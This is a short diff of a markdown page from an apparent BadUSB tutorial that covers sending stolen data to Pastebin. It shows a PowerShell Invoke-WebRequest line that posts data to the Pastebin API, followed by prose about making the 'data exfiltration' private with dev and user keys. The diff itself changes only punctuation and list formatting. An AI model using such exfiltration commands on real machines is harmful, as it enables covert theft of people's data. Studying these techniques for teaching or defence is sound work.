kenvb/badusb/docs/04pastebin.md

 Invoke-WebRequest -Uri "https://pastebin.com/api/api_post.php" -UseBasicParsing -Body $Body -Method Post -OutFile $Title.txt
 ```
 ## Preparing more advanced use of Pastebin
-Thus far, so our data exiltration is public.​ Thanks to the API key we can upload to Pastebin but we need to use authentication to make it private, so let’s make it private​ 😃
+Thus far, so our data exiltration is public.​ Thanks to the API key we can upload to Pastebin but we need to use authentication to make it private, so let’s make it private​ 😃.

 For this we need to setup our “userkey”​

-This means we will use 2 keys​
+This means we will use 2 keys​:

-Our dev key, which we already have​
+1. Our dev key, which we already have​.

-Our user key, still needs creation
+2. Our user key, which still needs creation.